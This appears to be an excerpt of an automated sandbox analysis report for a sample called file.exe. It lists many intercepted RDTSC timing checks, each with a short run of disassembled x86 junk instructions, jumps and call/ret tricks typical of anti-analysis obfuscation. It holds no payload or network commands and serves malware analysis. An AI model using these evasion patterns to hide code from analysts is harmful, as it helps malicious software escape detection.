            Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6C93D4 second address: 6C93E0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
            Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6C93E0 second address: 6C9404 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F377CE47997h 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e push esi 0x0000000f pushad 0x00000010 popad 0x00000011 pop esi 0x00000012 rdtsc
            Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6C9404 second address: 6C9409 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6C9409 second address: 6C9426 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 je 00007F377CE47986h 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 jng 00007F377CE47986h 0x00000017 jnp 00007F377CE47986h 0x0000001d rdtsc
            Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6C9426 second address: 6C942A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6C95A9 second address: 6C95AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6C9997 second address: 6C99B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F377C5325FBh 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6CC2CC second address: 6CC2D2 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6CC2D2 second address: 6CC2D7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6CC2D7 second address: 6CC31D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c jno 00007F377CE4799Fh 0x00000012 xor edi, 19400081h 0x00000018 push 00000000h 0x0000001a mov edx, dword ptr [ebp+122D3BE0h] 0x00000020 call 00007F377CE47989h 0x00000025 push esi 0x00000026 push ecx 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
            Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6CC31D second address: 6CC334 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop esi 0x00000006 push eax 0x00000007 pushad 0x00000008 jns 00007F377C5325ECh 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
            Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6CC334 second address: 6CC360 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a jmp 00007F377CE47990h 0x0000000f mov eax, dword ptr [eax] 0x00000011 pushad 0x00000012 jnl 00007F377CE4798Ch 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
            Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6CC360 second address: 6CC366 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6CC366 second address: 6CC374 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov dword ptr [esp+04h], eax 0x0000000a push esi 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
            Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6CC374 second address: 6CC3D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F377C5325F7h 0x00000009 popad 0x0000000a pop esi 0x0000000b pop eax 0x0000000c xor dword ptr [ebp+122D1DFFh], ebx 0x00000012 push 00000003h 0x00000014 or dword ptr [ebp+122D3015h], eax 0x0000001a push 00000000h 0x0000001c cmc 0x0000001d push 00000003h 0x0000001f sub dword ptr [ebp+122D1D5Dh], eax 0x00000025 call 00007F377C5325E9h 0x0000002a jmp 00007F377C5325EBh 0x0000002f push eax 0x00000030 push eax 0x00000031 push edx 0x00000032 jmp 00007F377C5325F5h 0x00000037 rdtsc
            Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6CC3D7 second address: 6CC42F instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F377CE47994h 0x00000008 jmp 00007F377CE4798Eh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f mov eax, dword ptr [esp+04h] 0x00000013 pushad 0x00000014 je 00007F377CE47988h 0x0000001a pushad 0x0000001b popad 0x0000001c push eax 0x0000001d pushad 0x0000001e popad 0x0000001f pop eax 0x00000020 popad 0x00000021 mov eax, dword ptr [eax] 0x00000023 pushad 0x00000024 jmp 00007F377CE47997h 0x00000029 pushad 0x0000002a ja 00007F377CE47986h 0x00000030 push edi 0x00000031 pop edi 0x00000032 popad 0x00000033 popad 0x00000034 mov dword ptr [esp+04h], eax 0x00000038 push edx 0x00000039 push eax 0x0000003a push edx 0x0000003b push ecx 0x0000003c pop ecx 0x0000003d rdtsc
            Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6CC42F second address: 6CC45C instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 sub dword ptr [ebp+122D1DF8h], eax 0x0000000e lea ebx, dword ptr [ebp+1246C1B5h] 0x00000014 clc 0x00000015 xchg eax, ebx 0x00000016 pushad 0x00000017 push edi 0x00000018 js 00007F377C5325E6h 0x0000001e pop edi 0x0000001f pushad 0x00000020 push eax 0x00000021 pop eax 0x00000022 push ebx 0x00000023 pop ebx 0x00000024 popad 0x00000025 popad 0x00000026 push eax 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b push eax 0x0000002c push edx 0x0000002d rdtsc
            Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6CC45C second address: 6CC460 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6CC460 second address: 6CC47D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F377C5325F9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6EC814 second address: 6EC868 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jnc 00007F377CE47986h 0x00000009 pop edx 0x0000000a push esi 0x0000000b pushad 0x0000000c popad 0x0000000d pop esi 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 jmp 00007F377CE47991h 0x00000016 pushad 0x00000017 push edi 0x00000018 pop edi 0x00000019 pushad 0x0000001a popad 0x0000001b jbe 00007F377CE47986h 0x00000021 jmp 00007F377CE47996h 0x00000026 popad 0x00000027 push esi 0x00000028 pushad 0x00000029 popad 0x0000002a pushad 0x0000002b popad 0x0000002c pop esi 0x0000002d push eax 0x0000002e push edx 0x0000002f jo 00007F377CE47986h 0x00000035 push eax 0x00000036 push edx 0x00000037 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6EC868 second address: 6EC86C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B504E second address: 6B5053 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6EA6AD second address: 6EA6B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6EA6B3 second address: 6EA6E1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F377CE4798Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F377CE47996h 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6EA6E1 second address: 6EA6EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F377C5325E6h 0x0000000a pop eax 0x0000000b rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6EA829 second address: 6EA843 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F377CE47995h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6EA978 second address: 6EA982 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F377C5325E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6EA982 second address: 6EA987 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6EA987 second address: 6EA9AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F377C5325F9h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6EA9AB second address: 6EA9AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6EAC72 second address: 6EAC77 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6EAC77 second address: 6EACA2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F377CE47992h 0x00000009 jmp 00007F377CE47991h 0x0000000e popad 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6EACA2 second address: 6EACCE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F377C5325E6h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 jnl 00007F377C5325F7h 0x00000016 pushad 0x00000017 pushad 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6EAE4C second address: 6EAE50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6EAE50 second address: 6EAE54 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6EAE54 second address: 6EAE5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6EAE5A second address: 6EAE75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007F377C5325F1h 0x0000000f rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6EAFBB second address: 6EAFC5 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F377CE4798Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6EB2A5 second address: 6EB2B2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jnc 00007F377C5325E6h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6EB800 second address: 6EB80C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 jc 00007F377CE47986h 0x0000000c rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6EB80C second address: 6EB834 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F377C5325F2h 0x00000007 jmp 00007F377C5325ECh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6EB834 second address: 6EB838 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6E33DA second address: 6E33E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6E33E0 second address: 6E33EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C2B34 second address: 6C2B38 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C2B38 second address: 6C2B40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6EC25A second address: 6EC264 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F377C5325ECh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6EC392 second address: 6EC3C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F377CE47992h 0x00000009 pop edi 0x0000000a pushad 0x0000000b jg 00007F377CE47986h 0x00000011 jmp 00007F377CE47990h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6EC3C2 second address: 6EC3D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push esi 0x00000008 pop esi 0x00000009 jnc 00007F377C5325E6h 0x0000000f rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6EE750 second address: 6EE754 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6EE754 second address: 6EE758 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6EE758 second address: 6EE75E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6EDD37 second address: 6EDD3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6EDD3B second address: 6EDD41 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6EEE06 second address: 6EEE0A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B6C04 second address: 6B6C11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 ja 00007F377CE47986h 0x0000000d rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B6C11 second address: 6B6C15 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C1031 second address: 6C1040 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jnl 00007F377CE47986h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C1040 second address: 6C1044 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C1044 second address: 6C104A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6F6E77 second address: 6F6E7D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6F6E7D second address: 6F6E9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F377CE4798Bh 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 ja 00007F377CE47986h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6F727D second address: 6F72B3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 jmp 00007F377C5325EAh 0x0000000e jmp 00007F377C5325F5h 0x00000013 pop esi 0x00000014 pushad 0x00000015 jmp 00007F377C5325EAh 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6F75AB second address: 6F75B3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6F75B3 second address: 6F75BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007F377C5325E6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6F75BF second address: 6F75C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6F75C3 second address: 6F75C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6F76ED second address: 6F76F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6F76F3 second address: 6F76F7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6F76F7 second address: 6F7718 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F377CE47991h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jl 00007F377CE4798Eh 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6F7824 second address: 6F783D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F377C5325ECh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a je 00007F377C5325E6h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FAFB2 second address: 6FAFDD instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 js 00007F377CE47991h 0x0000000f jmp 00007F377CE4798Bh 0x00000014 mov eax, dword ptr [esp+04h] 0x00000018 push eax 0x00000019 push edx 0x0000001a push edx 0x0000001b pop edx 0x0000001c pop edx 0x0000001d pop eax 0x0000001e mov eax, dword ptr [eax] 0x00000020 pushad 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 popad 0x00000025 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FAFDD second address: 6FAFF5 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F377C5325E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push esi 0x0000000b push esi 0x0000000c pop esi 0x0000000d pop esi 0x0000000e popad 0x0000000f mov dword ptr [esp+04h], eax 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FAFF5 second address: 6FAFF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FB4B4 second address: 6FB4B9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FBB62 second address: 6FBB66 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FBB66 second address: 6FBB6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FBB6C second address: 6FBB72 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FBB72 second address: 6FBB76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FBB76 second address: 6FBBC6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], ebx 0x0000000b push 00000000h 0x0000000d push edx 0x0000000e call 00007F377CE47988h 0x00000013 pop edx 0x00000014 mov dword ptr [esp+04h], edx 0x00000018 add dword ptr [esp+04h], 0000001Ch 0x00000020 inc edx 0x00000021 push edx 0x00000022 ret 0x00000023 pop edx 0x00000024 ret 0x00000025 push eax 0x00000026 or dword ptr [ebp+122D1D16h], edx 0x0000002c pop esi 0x0000002d nop 0x0000002e push eax 0x0000002f push edx 0x00000030 push eax 0x00000031 push edx 0x00000032 jmp 00007F377CE47994h 0x00000037 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FBBC6 second address: 6FBBD0 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F377C5325E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FBBD0 second address: 6FBBFF instructions: 0x00000000 rdtsc 0x00000002 jp 00007F377CE4798Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c jmp 00007F377CE47999h 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FBCFB second address: 6FBD00 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FC1D4 second address: 6FC1E4 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F377CE47986h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FC1E4 second address: 6FC1EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FC1EB second address: 6FC1F1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FC1F1 second address: 6FC233 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F377C5325E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d push 00000000h 0x0000000f push esi 0x00000010 call 00007F377C5325E8h 0x00000015 pop esi 0x00000016 mov dword ptr [esp+04h], esi 0x0000001a add dword ptr [esp+04h], 0000001Bh 0x00000022 inc esi 0x00000023 push esi 0x00000024 ret 0x00000025 pop esi 0x00000026 ret 0x00000027 call 00007F377C5325EBh 0x0000002c pop esi 0x0000002d xchg eax, ebx 0x0000002e pushad 0x0000002f push eax 0x00000030 push edx 0x00000031 push eax 0x00000032 push edx 0x00000033 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FC233 second address: 6FC237 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FC237 second address: 6FC252 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F377C5325F2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push edi 0x0000000b pop edi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FD10E second address: 6FD124 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F377CE47992h 0x00000009 rdtsc
